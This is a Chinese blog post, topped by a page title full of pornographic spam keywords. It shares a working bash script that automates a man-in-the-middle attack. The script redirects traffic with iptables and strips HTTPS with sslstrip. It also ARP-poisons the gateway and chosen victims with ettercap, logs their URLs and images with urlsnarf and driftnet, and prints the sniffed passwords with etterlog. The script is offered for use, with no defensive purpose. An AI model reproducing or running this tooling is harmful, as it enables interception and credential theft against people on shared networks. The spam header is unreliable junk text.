压在透明的玻璃上c-国产精品国产一级A片精品免费-国产精品视频网-成人黄网站18秘 免费看|www.tcsft.com

一個簡單的腳本,實現自動執行MITM攻擊

  這幾天折騰MITM攻擊,反復輸入同樣的命令很煩人,參照國外論壇一個腳本,結合自己的習慣修改了一下,將幾個常用命令寫到一個文件里,實現相對自動的操作。

  腳本很簡單,簡單說一下功能,內容就不多注釋了。

  一個簡單的腳本,實現自動執行MITM攻擊

  1)設置監聽網卡、端口、目標IP;

  2)設置tcpxtract、driftnet、urlsnarf等輔助工具的啟用;

  3)自動運行sslstrip和ettercap,并輸出數據到/tmp/(用戶定義)目錄中供后期分析;

  4)監聽結束后調用etterlog顯示數據,并調用wireshark進行抓包分析;

  5)簡單的輸入判定。

  #!/bin/bash

  echo ""

  echo "====================================="

  echo "  auto_cap.sh:MITM攻擊的自動操作腳本"

  echo "                    tankaiha"

  echo "====================================="

  echo ""

  while [ -z $DIRNAME ]

  do

  read -p "1)設置保存名稱,所有數據將保存在/tmp/"輸入名稱"/目錄中(重復目錄強制刪除):" DIRNAME

  done

  echo "";read -p "2)請設置網關地址(默認為192.168.1.1):" GATEWAY

  echo "";read -p "3)請設置需要監聽的IP地址,什么都不輸入時全部監聽:" TARGET

  echo "";read -p "4)是否使用tcpxtract自動導出圖片文件(有時時間較長,默認n)[y..n]:" XTRACT

  echo "";read -p "5)是否使用driftnet實時查看圖片(默認y)[y..n]:" DRIFT

  echo "";read -p "6)是否使用urlsnarf導出所有網站地址到txt文件(默認y)[y..n]:" SNARF

  echo -e "
本機可用網絡設備如下:"

  ifconfig | cut -d " " -f 1 |awk '$1 ~ /[^ ]/ {print $1}'

  while [ -z $IFACE ]

  do

  read -p "7)設置監聽設備(不能為空):" IFACE

  done

  echo "";read -p "8)設置監聽端口(默認10000):" SNIFFPORT

  if [ ${#SNIFFPORT} -eq 0 ];then

  SNIFFPORT=10000

  fi

  rm -rf /tmp/$DIRNAME/

  mkdir /tmp/$DIRNAME/

  iptables –flush

  iptables –table nat –flush

  iptables –delete-chain

  iptables –table nat –delete-chain

  iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port $SNIFFPORT

  sslstrip -pkf -l $SNIFFPORT -w /tmp/$DIRNAME/$DIRNAME.log 2>/dev/null &

  if [ "$SNARF" == "y" ] || [ ${#SNARF} -eq 0 ]; then

  urlsnarf -i $IFACE | grep http > /tmp/$DIRNAME/$DIRNAME.txt &

  fi

  if [ "$DRIFT" == "y" ] || [ ${#DRIFT} -eq 0 ]; then

  driftnet -i $IFACE &

  fi

  echo -e "
下面開始監聽,按q鍵退出"

  if [ ${#GATEWAY} -eq 0 ];then

  GATEWAY="192.168.1.1"

  fi

  ettercap -Tq -i $IFACE -w /tmp/$DIRNAME/$DIRNAME.pcap -L /tmp/$DIRNAME/$DIRNAME -M arp:remote /$GATEWAY/ /$TARGET/

  killall sslstrip

  killall python

  killall urlsnarf

  killall driftnet

  iptables –flush

  iptables –table nat –flush

  iptables –delete-chain

  iptables –table nat –delete-chain

  echo -e "監聽結束,下面進行后處理…
"

  if [ "$XTRACT" == "y" ];then

  echo -e "tcpxtract正在導出圖片…
"

  tcpxtract -f /tmp/$DIRNAME/$DIRNAME.pcap -o /tmp/$DIRNAME/ &

  fi

  echo -e "ettercap嗅探到的密碼如下:
"

  etterlog -p -i /tmp/$DIRNAME/$DIRNAME.eci

  read -p "是否用wireshark分析?(默認n):" SHARK

  if [ "$SHARK" == "y" ];then

  wireshark /tmp/$DIRNAME/$DIRNAME.pcap &

  fi

  echo -e "
程序退出…
"

 

上一篇:安卓防火墻 PS DroidWall

下一篇:利用背景安全加強BYOD管理